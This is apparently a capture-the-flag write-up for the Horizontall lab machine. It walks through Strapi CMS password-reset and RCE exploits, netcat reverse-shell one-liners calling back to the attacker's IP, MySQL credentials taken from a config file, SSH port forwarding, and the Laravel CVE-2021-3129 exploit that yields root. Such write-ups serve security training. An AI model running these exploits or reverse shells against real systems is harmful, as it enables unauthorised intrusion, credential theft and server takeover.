# NMAP SCAN
```nmap
PORT   STATE SERVICE VERSION  
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)  
| ssh-hostkey:    
|   2048 ee:77:41:43:d4:82:bd:3e:6e:6e:50:cd:ff:6b:0d:d5 (RSA)  
|   256 3a:d5:89:d5:da:95:59:d9:df:01:68:37:ca:d5:10:b0 (ECDSA)  
|_  256 4a:00:04:b4:9d:29:e7:af:37:16:1b:4f:80:2d:98:94 (ED25519)  
80/tcp open  http    nginx 1.14.0 (Ubuntu)  
|_http-server-header: nginx/1.14.0 (Ubuntu)  
|_http-title: horizontall  
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

# Web (Port 80)
## Findings
- Vue.js
- Nginx
- Found another subdomain in App.vue source code:
- Using strapi CMS
` axios.get('http://api-prod.horizontall.htb/reviews')`

### Feroxbuster
- Found admin panel for login.
`200 16l      101w      854c http://api-prod.horizontall.htb/admin`

# Foothold
- Strapi CMS has vulnerabilities which can lead to [RCE](https://www.exploit-db.com/exploits/50239)
- We can try to run the exploit
```py
python3 ape.py http://api-prod.horizontall.htb  
[+] Checking Strapi CMS Version running  
[+] Seems like the exploit will work!!!  
[+] Executing exploit  
  
  
[+] Password reset was successfully  
[+] Your email is: admin@horizontall.htb  
[+] Your new credentials are: admin:SuperStrongPassword1  
[+] Your authenticated JSON Web Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjMwNjQ4OTEwLCJleHAiOjE2MzMyNDA5MTB9.QK-8e3Sux8QNnjqG4nlVL3tq5SPt-KvZz  
FL_6q0Ph9Y  
  
  
$> whoami  
[+] Triggering Remote code executin  
[*] Rember this is a blind RCE don't expect to see output
rows 47 columns 236
```
- We can login into the login CMS
- We can upload but it's uploaded to another port on localhost.
- We find another exploit but this time authenticated [RCE](https://www.exploit-db.com/exploits/50238)
- If we send a reverse shell it works but it doesn't work with other commands for some reason.
```py
python3 lol.py http://api-prod.horizontall.htb eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZ└──╼ $python3 lol.py http://api-prod.horizontall.htb eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.e  
yJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjMwNjQ4OTEwLCJleHAiOjE2MzMyNDA5MTB9.QK-8e3Sux8QNnjqG4nlVL3tq5SPt-KvZzFL_6q0Ph9Y  "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.40 900  
1 >/tmp/f" 10.10.14.40
```
```py
nc -lvnp 9001  
listening on [any] 9001 ...  
connect to [10.10.14.40] from (UNKNOWN) [10.10.11.105] 37676  
sh: 0: can't access tty; job control turned off
```
- But this shell doesn't work. If we use the unauthenticated exploit for RCE we're able to get a shell.
```bash
┌─[faris@pavi]─[~/ctf]  
└──╼ $python3 ape.py http://api-prod.horizontall.htb  
[+] Checking Strapi CMS Version running  
[+] Seems like the exploit will work!!!  
[+] Executing exploit  
  
  
[+] Password reset was successfully  
[+] Your email is: admin@horizontall.htb  
[+] Your new credentials are: admin:SuperStrongPassword1  
[+] Your authenticated JSON Web Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjMwNjUxMDEzLCJleHAiOjE2MzMyNDMwMTN9.zMGsCOqi7u4ClkRAG7ogvB93frUaQnDmGh6eZn9yv0s  
  
  
$> rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.40 4444 >/tmp/f  
[+] Triggering Remote code executin  
[*] Rember this is a blind RCE don't expect to see output
```

```bash
listening on [any] 4444 ...  
connect to [10.10.14.40] from (UNKNOWN) [10.10.11.105] 56248  
sh: 0: can't access tty; job control turned off  
$ ls  
api  
build  
config  
extensions  
favicon.ico  
node_modules  
package.json  
package-lock.json  
public  
README.md
```

# Privilege Escalation
- We are user strapi
- Found mysql credentials in `/config/enviroments/development/config.json`
```json
{  
 "defaultConnection": "default",  
 "connections": {  
   "default": {  
     "connector": "strapi-hook-bookshelf",  
     "settings": {  
       "client": "mysql",  
       "database": "strapi",  
       "host": "127.0.0.1",  
       "port": 3306,  
       "username": "developer",  
       "password": "#J!:F9Zt2u"  
     },  
     "options": {}  
   }  
 }  
}
```
- Possible credentials:
`developer:#J!:F9Zt2u`
- Found credentials in mysql database.
`developer        | *FFE7D25121423869EB3DCC48D3E8C99C6E3530A7`
- Unable to crack the password.
- Something is running on port 8000
```bash
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                                                                                                                                                              
tcp        0      0 127.0.0.1:1337          0.0.0.0:*               LISTEN      1816/node /usr/bin/   
tcp        0      0 127.0.0.1:8000          0.0.0.0:*               LISTEN      -   
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -   
tcp6       0      0 :::80                   :::*                    LISTEN      -                                                                                                                                                              
tcp6       0      0 :::22                   :::*                    LISTEN      -
```
- 1337 is the file upload.
- We can try to curl that port
```bash
curl 127.0.0.1:8000
```
- It gives us the source code and leaves PHP version of Laravel.
- Laravel v8 (PHP v7.4.18)
- We can try port forwarding by using SSH.
`ssh -L 8000:127.0.0.1:8000 strapi@horizontall.htb -i ~/ctf/id_rsa`

Now we can access port 8000 on our localhost.
And we can confirm that it is running Laravel V8.

- Search on google for `Laravel V8 exploit`
- CVE number for it is `CVE-2021-3129 `
- Found a lot of exploits but I found this one the [best](https://github.com/nth347/CVE-2021-3129_exploit)

```bash
┌─[✗]─[faris@pavi]─[~/ctf/CVE-2021-3129_exploit]                                                                      
└──╼ $python3 exploit.py http://127.0.0.1:8000 Monolog/RCE1 id                                                                                                                                                                              
[i] Trying to clear logs                                   
[+] Logs cleared                                           
[i] PHPGGC not found. Cloning it                           
Cloning into 'phpggc'...                                   
remote: Enumerating objects: 2587, done.                   
remote: Counting objects: 100% (929/929), done.                                                                       
remote: Compressing objects: 100% (522/522), done.                                                                    
remote: Total 2587 (delta 374), reused 812 (delta 283), pack-reused 1658                                              
Receiving objects: 100% (2587/2587), 388.83 KiB | 644.00 KiB/s, done.                                                 
Resolving deltas: 100% (1016/1016), done.                  
[+] Successfully converted logs to PHAR                    
[+] PHAR deserialized. Exploited                           

uid=0(root) gid=0(root) groups=0(root)
```

- We can confirm we have RCE, let's get a reverse shell since it's running as root.
```bash
┌─[faris@pavi]─[~/ctf/CVE-2021-3129_exploit]                                                                          
└──╼ $python3 exploit.py http://127.0.0.1:8000 Monolog/RCE1 "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.40 4444 >/tmp/f"                                                                                                     
[i] Trying to clear logs                                   
[+] Logs cleared                                           
[+] PHPGGC found. Generating payload and deploy it to the target                                                      
[+] Successfully converted logs to PHAR                    
[i] There is no output                                     
[i] Trying to clear logs
```

```bash
┌─[faris@pavi]─[~]
└──╼ $nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.40] from (UNKNOWN) [10.10.11.105] 49670
sh: 0: can't access tty; job control turned off
# ls
favicon.ico
index.php
robots.txt
web.config
# cd
# ls
boot.sh
pid
restart.sh
root.txt
# cat root.txt
```
- We receive the shell, we are root.
